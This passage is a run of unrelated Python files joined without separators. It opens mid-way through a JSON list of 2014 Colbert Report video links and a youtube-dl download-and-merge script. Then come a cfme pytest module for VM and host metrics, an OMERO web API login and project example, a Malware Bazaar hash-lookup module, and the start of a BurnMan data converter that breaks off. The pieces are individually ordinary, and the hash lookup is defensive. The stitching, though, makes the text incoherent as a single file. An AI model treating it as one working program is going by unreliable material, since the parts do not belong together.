        "http://thecolbertreport.cc.com/videos/c7wjzg/michael-lewis",
        "http://thecolbertreport.cc.com/videos/64x2gg/sign-off---goodnight"
      ],
      "guest": "Michael Lewis"
    },
    {
      "date": "2014-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ladjef/gamergate",
        "http://thecolbertreport.cc.com/videos/wr7hqq/gamergate---anita-sarkeesian",
        "http://thecolbertreport.cc.com/videos/ll1e16/heroism-in-canada",
        "http://thecolbertreport.cc.com/videos/1h66nr/jill-lepore",
        "http://thecolbertreport.cc.com/videos/1fc6m9/sign-off---microphone"
      ],
      "guest": "Jill Lepore"
    },
    {
      "date": "2014-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qvw67z/intro---10-30-14",
        "http://thecolbertreport.cc.com/videos/hxvn8w/-america-again--in-paperback",
        "http://thecolbertreport.cc.com/videos/365nm9/america-s-midterm-indifference---george-takei",
        "http://thecolbertreport.cc.com/videos/cykxut/the-perils-of-anchor-zygotes",
        "http://thecolbertreport.cc.com/videos/tqbn3t/david-miliband",
        "http://thecolbertreport.cc.com/videos/4rgfpm/sign-off---goodnight"
      ],
      "guest": "David Miliband"
    },
    {
      "date": "2014-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cvjwus/intro---11-3-14",
        "http://thecolbertreport.cc.com/videos/p6uab8/midterms--014---detour-to-gridlock---midterm-flyer-of-shame",
        "http://thecolbertreport.cc.com/videos/qmg04s/tip-wag---nazi-dairy-products--tim-cook---prostate-health-researchers",
        "http://thecolbertreport.cc.com/videos/rw2v1b/stephen-colbert-s-enchanted-princess-pixie-wedding-cake",
        "http://thecolbertreport.cc.com/videos/lffyr9/chuck-todd",
        "http://thecolbertreport.cc.com/videos/xrfsl8/sign-off---goodnight"
      ],
      "guest": "Chuck Todd"
    },
    {
      "date": "2014-11-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1g0aji/midterms--014---detour-to-gridlock---live-coverage",
        "http://thecolbertreport.cc.com/videos/cmr0z4/midterms--014---detour-to-gridlock---mountains-of-midterm-madness",
        "http://thecolbertreport.cc.com/videos/w3muth/midterms--014---detour-to-gridlock---social-tracker-8700",
        "http://thecolbertreport.cc.com/videos/ekj19q/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/ckxbqk/sign-off---stephen-s-last-election-special"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2014-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c5okdm/intro---11-5-14",
        "http://thecolbertreport.cc.com/videos/ywqnjy/the-republicans-win-everything",
        "http://thecolbertreport.cc.com/videos/wq84nn/better-know-a-district---california-s-13th---barbara-lee",
        "http://thecolbertreport.cc.com/videos/7feu8t/legalized-marijuana-in-washington--d-c-",
        "http://thecolbertreport.cc.com/videos/w2qs7x/kirsten-gillibrand",
        "http://thecolbertreport.cc.com/videos/tno5bj/sign-off---goodnight"
      ],
      "guest": "Sen. Kirsten Gillibrand"
    },
    {
      "date": "2014-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kk2x1a/intro---11-6-14",
        "http://thecolbertreport.cc.com/videos/rtdlsr/busted-for-feeding-the-homeless",
        "http://thecolbertreport.cc.com/videos/3rw0tz/cheating-death---aging---women-s-health",
        "http://thecolbertreport.cc.com/videos/sc6mpp/the-republicans--inspiring-climate-change-message",
        "http://thecolbertreport.cc.com/videos/v06v9z/steven-johnson",
        "http://thecolbertreport.cc.com/videos/yzaj23/sign-off---goodnight"
      ],
      "guest": "Steven Johnson"
    },
    {
      "date": "2014-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/erbk9q/intro---11-10-14",
        "http://thecolbertreport.cc.com/videos/xnwueh/big-news-from-the-hermit-kingdom",
        "http://thecolbertreport.cc.com/videos/avadrz/the-word---it-s-a-trap-",
        "http://thecolbertreport.cc.com/videos/87vgoo/adventures-in-snackology",
        "http://thecolbertreport.cc.com/videos/sbmlul/andy-cohen",
        "http://thecolbertreport.cc.com/videos/7uog9s/sign-off---goodnight"
      ],
      "guest": "Andy Cohen"
    },
    {
      "date": "2014-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mnkz05/intro---11-11-14",
        "http://thecolbertreport.cc.com/videos/wht7i8/uncertain-death-for-isis-s-leader",
        "http://thecolbertreport.cc.com/videos/thgfth/blowback-from-obama-s-visit-to-china",
        "http://thecolbertreport.cc.com/videos/uqricc/tip-wag---breitbart",
        "http://thecolbertreport.cc.com/videos/41fe1h/diane-von-furstenberg",
        "http://thecolbertreport.cc.com/videos/ncl44x/sign-off---cheerful-reflection"
      ],
      "guest": "Diane Von Furstenberg"
    },
    {
      "date": "2014-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/80wk4b/intro---11-12-14",
        "http://thecolbertreport.cc.com/videos/a1b4ph/new-york-city-s-rat-deficiency",
        "http://thecolbertreport.cc.com/videos/rn92gg/stephen-colbert-s-auto-robotic-fixation",
        "http://thecolbertreport.cc.com/videos/hhmb28/mr--smith-goes-to-the-state-legislature--then-later-possibly-washington---gordon-klingenschmitt",
        "http://thecolbertreport.cc.com/videos/6wtwlg/terence-tao",
        "http://thecolbertreport.cc.com/videos/a1eex6/sign-off---red-wine"
      ],
      "guest": "Terence Tao"
    },
    {
      "date": "2014-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jtbvle/reforming-health-care-reform",
        "http://thecolbertreport.cc.com/videos/fe3wjm/reforming-health-care-reform---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/cvq86c/gay-marriage-victory-in-south-carolina",
        "http://thecolbertreport.cc.com/videos/3pu1ey/jennifer-lawrence",
        "http://thecolbertreport.cc.com/videos/9aqahd/sign-off---goodnight"
      ],
      "guest": "Jennifer Lawrence"
    },
    {
      "date": "2014-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qed7bp/bono-s-missing-luggage",
        "http://thecolbertreport.cc.com/videos/9dr12d/survival-tips-from--good-morning-america-",
        "http://thecolbertreport.cc.com/videos/7vjzxb/bernie-sanders-pt--1",
        "http://thecolbertreport.cc.com/videos/67tlr7/bernie-sanders-pt--2",
        "http://thecolbertreport.cc.com/videos/uqho5w/sign-off---goodnight"
      ],
      "guest": "Sen. Bernie Sanders"
    },
    {
      "date": "2014-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fys4c2/intro---11-18-14",
        "http://thecolbertreport.cc.com/videos/ib2b3k/polar-plunge",
        "http://thecolbertreport.cc.com/videos/iw2iwg/obama-s-immigration-plan---esteban-colberto",
        "http://thecolbertreport.cc.com/videos/bbfckz/tip-wag---salvage-stores---maine",
        "http://thecolbertreport.cc.com/videos/o8su6y/eva-longoria",
        "http://thecolbertreport.cc.com/videos/vu8jpe/sign-off---goodnight"
      ],
      "guest": "Eva Longoria"
    },
    {
      "date": "2014-11-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7mkltp/simulated-school-attack-in-florida",
        "http://thecolbertreport.cc.com/videos/dvppp6/difference-makers---the-free-keene-squad",
        "http://thecolbertreport.cc.com/videos/sdqbxm/black-friday-sale",
        "http://thecolbertreport.cc.com/videos/9yc4ry/toni-morrison",
        "http://thecolbertreport.cc.com/videos/y4ygag/sign-off---goodnight"
      ],
      "guest": "Toni Morrison"
    },
    {
      "date": "2014-11-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/01iemp/obama-s-executive-amnesty",
        "http://thecolbertreport.cc.com/videos/fie7ef/threatdown---declining-standards-of-sexiness--people-who-eat-chocolate---invaders-of-the-new-world",
        "http://thecolbertreport.cc.com/videos/e55wo4/jon-stewart-pt--1",
        "http://thecolbertreport.cc.com/videos/vbi9v5/jon-stewart-pt--2",
        "http://thecolbertreport.cc.com/videos/zwcggy/sign-off---goodnight"
      ],
      "guest": "Jon Stewart"
    },
    {
      "date": "2014-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wmtufg/intro---12-1-14",
        "http://thecolbertreport.cc.com/videos/umsrnb/lightsaber-controversy",
        "http://thecolbertreport.cc.com/videos/wud7e1/ferguson-fallout-and-the-st--louis-rams",
        "http://thecolbertreport.cc.com/videos/d6xq50/jihadis-of-the-high-seas",
        "http://thecolbertreport.cc.com/videos/3h1qqa/john-mccain",
        "http://thecolbertreport.cc.com/videos/dnrg1a/sign-off---goodnight"
      ],
      "guest": "Sen. John McCain"
    },
    {
      "date": "2014-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/v8mtsf/intro---12-2-14",
        "http://thecolbertreport.cc.com/videos/hyqrm1/announcing-the-mr--colbert-goes-to-washington-special",
        "http://thecolbertreport.cc.com/videos/ethq4d/the-word---crook-and-ladder",
        "http://thecolbertreport.cc.com/videos/lje2l4/blitzkrieg-on-grinchitude---mistletoe-drones",
        "http://thecolbertreport.cc.com/videos/z0hz76/tony-bennett-and-lady-gaga"
      ],
      "guest": "Tony Bennett &amp; Lady Gaga"
    },
    {
      "date": "2014-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c9s1cs/intro---12-3-14",
        "http://thecolbertreport.cc.com/videos/nxwili/the-no-social-security-for-nazis-act",
        "http://thecolbertreport.cc.com/videos/ziipwv/thought-for-food---fairlife-milk---pizza-hut-s-subconscious-menu",
        "http://thecolbertreport.cc.com/videos/fpdlpw/surprise-visit-from-amy-sedaris",
        "http://thecolbertreport.cc.com/videos/4r9o52/christopher-nolan",
        "http://thecolbertreport.cc.com/videos/nwo3n2/sign-off---goodnight"
      ],
      "guest": "Christopher Nolan"
    },
    {
      "date": "2014-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ik935r/president-barack-obama-to-appear-on-the-report",
        "http://thecolbertreport.cc.com/videos/d5k5nz/outrage-over-eric-garner-decision",
        "http://thecolbertreport.cc.com/videos/pxune6/obama-s-bold-and-beautiful-ambassador-pick",
        "http://thecolbertreport.cc.com/videos/nucbbu/paul-farmer",
        "http://thecolbertreport.cc.com/videos/82d47r/sign-off---grimmy"
      ],
      "guest": "Dr. Paul Farmer"
    },
    {
      "date": "2014-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u8bqev/mr--colbert-goes-to-washington",
        "http://thecolbertreport.cc.com/videos/cnlqbr/better-know-a-america---the-fightin--us",
        "http://thecolbertreport.cc.com/videos/88p9oh/the-word---president-barack-obama---to-health-in-a-handbasket",
        "http://thecolbertreport.cc.com/videos/i14vel/president-barack-obama-pt--1",
        "http://thecolbertreport.cc.com/videos/mpmtan/president-barack-obama-pt--2",
        "http://thecolbertreport.cc.com/videos/3mcn6y/sign-off---see-ya",
        "http://thecolbertreport.cc.com/videos/4mkbqz/exclusive---president-barack-obama-extended-interview"
      ],
      "guest": "President Barack Obama"
    },
    {
      "date": "2014-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tgnj0t/-eaten-alive--outrage",
        "http://thecolbertreport.cc.com/videos/vd3icz/better-know-a-district---georgia-s-1st---reuniting-with-rep--jack-kingston",
        "http://thecolbertreport.cc.com/videos/pz35hw/who-s-honoring-me-now----entertainment-weekly",
        "http://thecolbertreport.cc.com/videos/2kz4pi/james-corden",
        "http://thecolbertreport.cc.com/videos/0frj3t/sign-off---sting"
      ],
      "guest": "James Corden"
    },
    {
      "date": "2014-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kquici/cia-torture-report",
        "http://thecolbertreport.cc.com/videos/rlpjf5/cia-torture-report---pundits-defend-america",
        "http://thecolbertreport.cc.com/videos/z4grj8/cia-torture-report---tom-blanton",
        "http://thecolbertreport.cc.com/videos/8i6klx/sarah-koenig",
        "http://thecolbertreport.cc.com/videos/im3k81/sign-off---headphones"
      ],
      "guest": "Sarah Koenig"
    },
    {
      "date": "2014-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/anckrc/scott-walker-s-hanukkah-gaffe",
        "http://thecolbertreport.cc.com/videos/399enl/yahweh-or-no-way---epic-casting-controversy",
        "http://thecolbertreport.cc.com/videos/p9nk9d/announcing-the-colbert-report-raffle",
        "http://thecolbertreport.cc.com/videos/509747/smaug",
        "http://thecolbertreport.cc.com/videos/mfxigz/sign-off---aftermath-of-smaug"
      ],
      "guest": "\"The Hobbit: Battle of the Five Armies\" special"
    },
    {
      "date": "2014-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bt8vk8/intro---12-15-14",
        "http://thecolbertreport.cc.com/videos/lwna3x/michele-bachmann-s-extreme-holiday-cheer",
        "http://thecolbertreport.cc.com/videos/0frisd/formidable-opponent---torture-report",
        "http://thecolbertreport.cc.com/videos/9xetgg/kim-jong-un-s-exclusive-name---sony-s-hack-attack",
        "http://thecolbertreport.cc.com/videos/j9u5in/seth-rogen",
        "http://thecolbertreport.cc.com/videos/bhrczk/sign-off---goodnight"
      ],
      "guest": "Seth Rogen"
    },
    {
      "date": "2014-12-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/arfo3o/jeb-bush-s-presidential-ambitions",
        "http://thecolbertreport.cc.com/videos/tnwzte/oil-war---jason-bordoff",
        "http://thecolbertreport.cc.com/videos/vd8ci4/colbert-platinum---holiday-gift-edition",
        "http://thecolbertreport.cc.com/videos/w5h8eb/kendrick-lamar",
        "http://thecolbertreport.cc.com/videos/pjrqsj/kendrick-lamar---debut-of-untitled-track"
      ],
      "guest": "Kendrick Lamar"
    }
  ]
}


working_folder = 'G:/Downloads'
for colbDate in testP['2014']:
    if 1:
        newfileResize = 'G:/downloads/The Colbert Report 2014/TheColbertReport '+colbDate['date']+'.mp4'
        if not os.path.exists(newfileResize):
            folderName = 'G:/downloads/The Colbert Report 2014/'+colbDate['date']
            try:
                os.mkdir(folderName)
            except:
                pass
            pos = 0
        
            for vid in colbDate['videos']:
                pos+=1
                done = False            
                while not done:
                    folderContents = os.listdir(folderName)                
                    for folderContent in folderContents:
                        if folderContent.startswith(str(pos)+' ') and (not folderContent.endswith('.part')):
                            done = True
                    
                    if not done:
                        cmd = os.path.join(working_folder,'youtube-dl.exe') + ' --no-continue -o "'+folderName+'/'+str(pos)+' %(title)s.%(ext)s" '+vid
                        subprocess.call(cmd,shell=True)
            vids = []
            for vid in os.listdir(folderName):
                if vid.endswith('.mp4'):
                    vids.append(os.path.join(folderName,vid))
            vids.sort()
            newfile = 'G:/downloads/The Colbert Report 2014/TheColbertReport '+colbDate['date']+'temp.mp4'
            
            if not os.path.exists(newfileResize):            
                cmd = r' -cat "' + r'" -cat "'.join(vids) + r'" -new "'+newfile+'"'
                exc = "G:/Downloads/mp4box.exe -tmp G:/temp/ " + cmd
                subprocess.call(exc,shell=True)
                cmd = "G:/Downloads/ffmpeg/bin/ffmpeg.exe -i \"" + newfile + "\" -vf scale=1024:576 \""+newfileResize+"\""
                subprocess.call(cmd,shell=True)
                while os.path.exists(newfile):
                    try:
                        os.remove(newfile)
                    except:
                        pass
            else:
                print 'file found ' + newfile
        
        
                 
     


# -*- coding: utf-8 -*-

import random
from operator import attrgetter

import pytest

from cfme import test_requirements
from cfme.cloud.provider import CloudProvider
from cfme.cloud.provider.azure import AzureProvider
from cfme.cloud.provider.ec2 import EC2Provider
from cfme.cloud.provider.gce import GCEProvider
from cfme.cloud.provider.openstack import OpenStackProvider
from cfme.common.provider import BaseProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from cfme.utils import conf
from cfme.utils.blockers import BZ
from cfme.utils.log import logger
from cfme.utils.wait import wait_for
from cfme.fixtures.provider import setup_or_skip

pytestmark = [
    pytest.mark.tier(1),
    test_requirements.c_and_u,
    pytest.mark.provider(
        [VMwareProvider, RHEVMProvider, EC2Provider, OpenStackProvider, AzureProvider, GCEProvider],
        required_fields=[(['cap_and_util', 'capandu_vm'], 'cu-24x7')], scope="module")
]


@pytest.fixture(scope="module")
def clean_setup_provider(request, provider):
    BaseProvider.clear_providers()
    setup_or_skip(request, provider)
    yield
    BaseProvider.clear_providers()


def vm_count(appliance, metrics_tbl, mgmt_system_id):
    return bool(appliance.db.client.session.query(metrics_tbl).filter(
        metrics_tbl.parent_ems_id == mgmt_system_id).filter(
        metrics_tbl.resource_type == "VmOrTemplate").count()
    )


def host_count(appliance, metrics_tbl, mgmt_system_id):
    return bool(appliance.db.client.session.query(metrics_tbl).filter(
        metrics_tbl.parent_ems_id == mgmt_system_id).filter(
        metrics_tbl.resource_type == "Host").count()
    )


@pytest.fixture(scope="module")
def metrics_collection(appliance, clean_setup_provider, provider, enable_candu):
    """Check the db is gathering collection data for the given provider.

    Metadata:
        test_flag: metrics_collection
    """
    metrics_tbl = appliance.db.client['metrics']
    mgmt_systems_tbl = appliance.db.client['ext_management_systems']

    logger.info("Fetching provider ID for %s", provider.key)
    mgmt_system_id = appliance.db.client.session.query(mgmt_systems_tbl).filter(
        mgmt_systems_tbl.name == conf.cfme_data.get('management_systems', {})[provider.key]['name']
    ).first().id

    logger.info("ID fetched; testing metrics collection now")

    # vms for both infa and cloud provider
    wait_for(
        vm_count, [appliance, metrics_tbl, mgmt_system_id],
        delay=20,
        timeout=1500,
        fail_condition=False,
        message="wait for VMs")

    # host only for infa
    if provider.category == "infra":
        wait_for(
            vm_count, [appliance, metrics_tbl, mgmt_system_id],
            delay=20,
            timeout=1500,
            fail_condition=False,
            message="wait for hosts.")


def get_host_name(provider):
    cfme_host = random.choice(provider.data["hosts"])
    return cfme_host.name


def query_metric_db(appliance, provider, metric, vm_name=None, host_name=None):
    metrics_tbl = appliance.db.client['metrics']
    ems = appliance.db.client['ext_management_systems']
    if vm_name is None:
        if host_name is not None:
            object_name = host_name
    elif vm_name is not None:
        object_name = vm_name

    with appliance.db.client.transaction:
        provs = (
            appliance.db.client.session.query(metrics_tbl.id)
            .join(ems, metrics_tbl.parent_ems_id == ems.id)
            .filter(metrics_tbl.resource_name == object_name,
            ems.name == provider.name)
        )
    return appliance.db.client.session.query(metrics_tbl).filter(
        metrics_tbl.id.in_(provs.subquery()))


@pytest.mark.rhv2
# Tests to check that specific metrics are being collected
@pytest.mark.meta(
    blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
    unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_cpu(metrics_collection, appliance, provider):
    vm_name = provider.data['cap_and_util']['capandu_vm']
    if provider.category == "infra":
        query = query_metric_db(appliance, provider, 'cpu_usagemhz_rate_average',
            vm_name)
        average_rate = attrgetter('cpu_usagemhz_rate_average')
    elif provider.category == "cloud":
        query = query_metric_db(appliance, provider, 'cpu_usage_rate_average',
            vm_name)
        average_rate = attrgetter('cpu_usage_rate_average')

    for record in query:
        if average_rate(record) is not None:
            assert average_rate(record) > 0, 'Zero VM CPU Usage'
            break


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(EC2Provider) or provider.one_of(GCEProvider))
def test_raw_metric_vm_memory(metrics_collection, appliance, provider):
    vm_name = provider.data['cap_and_util']['capandu_vm']

    if provider.type == 'azure':
        query = query_metric_db(appliance, provider, 'mem_usage_absolute_average',
            vm_name)
        average_rate = attrgetter('mem_usage_absolute_average')
    else:
        query = query_metric_db(appliance, provider, 'derived_memory_used',
            vm_name)
        average_rate = attrgetter('derived_memory_used')

    for record in query:
        if average_rate(record) is not None:
            assert average_rate(record) > 0, 'Zero VM Memory Usage'
            break


@pytest.mark.rhv2
@pytest.mark.meta(
    blockers=[BZ(1408963, forced_streams=["5.8", "upstream"],
    unblock=lambda provider: not provider.one_of(RHEVMProvider))]
)
@pytest.mark.meta(
    blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
    unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_network(metrics_collection, appliance, provider):
    vm_name = provider.data['cap_and_util']['capandu_vm']
    query = query_metric_db(appliance, provider, 'net_usage_rate_average',
        vm_name)

    for record in query:
        if record.net_usage_rate_average is not None:
            assert record.net_usage_rate_average > 0, 'Zero VM Network IO'
            break


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(EC2Provider))
@pytest.mark.meta(
    blockers=[BZ(1511099, forced_streams=["5.8", "upstream"],
    unblock=lambda provider: not provider.one_of(GCEProvider))]
)
def test_raw_metric_vm_disk(metrics_collection, appliance, provider):
    vm_name = provider.data['cap_and_util']['capandu_vm']
    query = query_metric_db(appliance, provider, 'disk_usage_rate_average',
        vm_name)

    for record in query:
        if record.disk_usage_rate_average is not None:
            assert record.disk_usage_rate_average > 0, 'Zero VM Disk IO'
            break


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_cpu(metrics_collection, appliance, provider):
    host_name = get_host_name(provider)
    query = query_metric_db(appliance, provider, 'cpu_usagemhz_rate_average',
        host_name)

    for record in query:
        if record.cpu_usagemhz_rate_average is not None:
            assert record.cpu_usagemhz_rate_average > 0, 'Zero Host CPU Usage'
            break


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_memory(metrics_collection, appliance, provider):
    host_name = get_host_name(provider)
    query = query_metric_db(appliance, provider, 'derived_memory_used',
        host_name)

    for record in query:
        if record.derived_memory_used is not None:
            assert record.derived_memory_used > 0, 'Zero Host Memory Usage'
            break


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(CloudProvider))
def test_raw_metric_host_network(metrics_collection, appliance, provider):
    host_name = get_host_name(provider)
    query = query_metric_db(appliance, provider, 'net_usage_rate_average',
        host_name)

    for record in query:
        if record.net_usage_rate_average is not None:
            assert record.net_usage_rate_average > 0, 'Zero Host Network IO'
            break


@pytest.mark.rhv2
@pytest.mark.uncollectif(
    lambda provider: provider.one_of(CloudProvider))
@pytest.mark.meta(
    blockers=[BZ(1424589, forced_streams=["5.8", "5.9", "upstream"],
    unblock=lambda provider: not provider.one_of(RHEVMProvider))]
)
def test_raw_metric_host_disk(metrics_collection, appliance, provider):
    host_name = get_host_name(provider)
    query = query_metric_db(appliance, provider, 'disk_usage_rate_average',
        host_name)

    for record in query:
        if record.disk_usage_rate_average is not None:
            assert record.disk_usage_rate_average > 0, 'Zero Host Disk IO'
            break

#!/usr/bin/env python
# -*- coding: utf-8 -*-

#
# Copyright (C) 2016-2017 University of Dundee & Open Microscopy Environment.
#                    All Rights Reserved.
# Use is subject to license terms supplied in LICENSE.txt
#

import requests

from Parse_OMERO_Properties import USERNAME, PASSWORD, OMERO_WEB_HOST, \
    SERVER_NAME

session = requests.Session()

# Start by getting supported versions from the base url...
api_url = '%s/api/' % OMERO_WEB_HOST
print "Starting at:", api_url
r = session.get(api_url)
# we get a list of versions
versions = r.json()['data']

# use most recent version...
version = versions[-1]
# get the 'base' url
base_url = version['url:base']
r = session.get(base_url)
# which lists a bunch of urls as starting points
urls = r.json()
servers_url = urls['url:servers']
login_url = urls['url:login']
projects_url = urls['url:projects']
save_url = urls['url:save']
schema_url = urls['url:schema']

# To login we need to get CSRF token
token_url = urls['url:token']
token = session.get(token_url).json()['data']
print 'CSRF token', token
# We add this to our session header
# Needed for all POST, PUT, DELETE requests
session.headers.update({'X-CSRFToken': token,
                        'Referer': login_url})

# List the servers available to connect to
servers = session.get(servers_url).json()['data']
print 'Servers:'
for s in servers:
    print '-id:', s['id']
    print ' name:', s['server']
    print ' host:', s['host']
    print ' port:', s['port']
# find one called SERVER_NAME
servers = [s for s in servers if s['server'] == SERVER_NAME]
if len(servers) < 1:
    raise Exception("Found no server called '%s'" % SERVER_NAME)
server = servers[0]

# Login with username, password and token
payload = {'username': USERNAME,
           'password': PASSWORD,
           # 'csrfmiddlewaretoken': token,  # Using CSRFToken in header instead
           'server': server['id']}

r = session.post(login_url, data=payload)
login_rsp = r.json()
assert r.status_code == 200
assert login_rsp['success']
eventContext = login_rsp['eventContext']
print 'eventContext', eventContext
# Can get our 'default' group
groupId = eventContext['groupId']

# With successful login, request.session will contain
# OMERO session details and reconnect to OMERO on
# each subsequent call...

# List projects:
# Limit number of projects per page
payload = {'limit': 2}
data = session.get(projects_url, params=payload).json()
assert len(data['data']) < 3
print "Projects:"
for p in data['data']:
    print '  ', p['@id'], p['Name']

# Create a project:
projType = schema_url + '#Project'
# Need to specify target group
url = save_url + '?group=' + str(groupId)
r = session.post(url, json={'Name': 'API TEST foo', '@type': projType})
assert r.status_code == 201
project = r.json()['data']
project_id = project['@id']
print 'Created Project:', project_id, project['Name']

# Get project by ID
project_url = projects_url + str(project_id) + '/'
r = session.get(project_url)
project = r.json()
print project

# Update a project
project['Name'] = 'API test updated'
r = session.put(save_url, json=project)

# Delete a project:
r = session.delete(project_url)

#python imports
import sys
import os
import time
import datetime
import subprocess
import json
import requests
from termcolor import colored

#third-party imports
#No third-party imports

#programmer generated imports
from logger import logger
from fileio import fileio

'''
***BEGIN DESCRIPTION***
Type: Search - Description: Searches for any available data on a target against the Abuse.ch Malware Bazaar database.
***END DESCRIPTION***
'''
def POE(POE):

    if (POE.logging == True): 
        LOG = logger() 
    newlogentry = ''
    reputation_dump = ''
    reputation_output_data = ''
    malwarebazaar = ''

    if (POE.logging == True):
        newlogentry = 'Module: malware_bazaar_search'           
        LOG.WriteStrongLog(POE.logdir, POE.targetfilename, newlogentry)

    if (POE.SHA256 == ''):
        print (colored('\r\n[x] Unable to execute Malware Bazaar Search - hash value must be SHA256.', 'red', attrs=['bold']))
        newlogentry = 'Unable to execute Malware Bazaar Search  - hash value must be SHA256'
        LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
        return -1

    global json
    query_status = ''
    first_seen = ''
    last_seen = ''
    signature = ''
    sig_count = 0
    output = POE.logdir + 'MalwareBazaarSearch.json'

    FI = fileio()

    print (colored('\r\n[*] Running abuse.ch Malware Bazaar Search against: ' + POE.target, 'white', attrs=['bold']))

    malwarebazaar = "https://mb-api.abuse.ch/api/v1/" #API URL
    data = { #Our header params
      'query': 'get_info',
      'hash': POE.SHA256,
    }

    response_dump = requests.post(malwarebazaar, data=data, timeout=15) # Give us the results as JSON

    if (POE.debug == True):
        print (response_dump)

    try:        
        FI.WriteLogFile(output, response_dump.content.decode("utf-8", "ignore"))
        print (colored('[*] Malware Bazaar data had been written to file here: ', 'green') + colored(output, 'blue', attrs=['bold']))
        if ((POE.logging == True) and (POE.nolinksummary == False)):
            newlogentry = 'Malware Bazaar data has been generated to file here: <a href=\"' + output + '\"> Malware Bazaar Host Output </a>'           
            LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
    except:
        print (colored('[x] Unable to write Malware Bazaar data to file', 'red', attrs=['bold']))
        if (POE.logging == True):
            newlogentry = 'Unable to write Malware Bazaar data to file'
            LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
            POE.csv_line += 'N/A,'
        return -1

    try:
        #Open the file we just downloaded
        print ('[-] Reading Malware Bazaar file: ' + output.strip())

        with open(output.strip(), 'rb') as read_file:
            data = json.load(read_file, cls=None)
        read_file.close()

        # Check what kind of results we have
        query_status = data["query_status"]      
        print ('[*] query_status: ' + query_status)
        if (query_status == 'ok'):
            with open(output.strip(), 'r') as read_file:
                for string in read_file:
                    if (POE.debug == True):
                        print ('[DEBUG] string: ' + string.strip())
                    if ('first_seen' in string):
                        first_seen = string.strip()                    
                    if ('last_seen' in string):
                        last_seen = string.strip()
                    if (('signature' in string) and (sig_count == 0)):
                        signature = string.strip()
                        sig_count += 1
            print ('[*] Sample ' + first_seen.replace(',',''))
            print ('[*] Sample ' + last_seen.replace(',',''))
            print ('[*] Sample ' + signature.replace(',',''))
            if (POE.logging == True):
                newlogentry = 'Sample ' + first_seen.replace(',','')
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
                newlogentry = 'Sample ' + last_seen.replace(',','')
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry) 
                newlogentry = 'Sample ' + signature.replace(',','')
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
        #Can't find anything on this one... 
        elif (query_status == 'hash_not_found'):
            print (colored('[-] The hash value has not been found...', 'yellow', attrs=['bold']))
            if (POE.logging == True):
                newlogentry = 'No results available for host...'
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
        #Can't find anything on this one...
        elif (query_status == 'no_results'):
            print (colored('[-] No results available for host...', 'yellow', attrs=['bold']))
            if (POE.logging == True):
                newlogentry = 'No results available for host...'
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
        #Something weird happened...
        else:
            print (colored('[x] An error has occurred...', 'red', attrs=['bold']))
            if (POE.logging == True):
                newlogentry = 'An error has occurred...'
                LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)     
    except Exception as e:
        print (colored('[x] Error: ' + str(e) + ' Terminating...', 'red', attrs=['bold']))
        read_file.close()
        return -1
    #Clean up before returning    
    read_file.close()

    return 0

# BurnMan - a lower mantle toolkit
# Copyright (C) 2012-2014, Myhill, R., Heister, T., Unterborn, C., Rose, I. and Cottaar, S.
# Released under GPL v2 or later.

# This is a standalone program that converts a tabulated version of the Stixrude and Lithgow-Bertelloni data format into the standard burnman format (printed to stdout)


import sys


def read_dataset(datafile):
    f=open(datafile,'r')
    ds=[]
    for line in f:
        ds.append(line.decode('utf-8').split())
    return ds

ds=read_dataset('HHPH2013_endmembers.dat')

print '# BurnMan - a lower mantle toolkit'
print '# Copyright (C) 2012, 2013, Heister, T., Unterborn, C., Rose, I. and Cottaar, S.'
print '# Released under GPL v2 or later.'
print ''
print '"""'
print 'HHPH_2013'
print 'Minerals from Holland et al 2013 and references therein'
print 'The values in this document are all in S.I. units,'
print 'unlike those in the original paper'
print 'File autogenerated using HHPHdata_to_burnman.py'
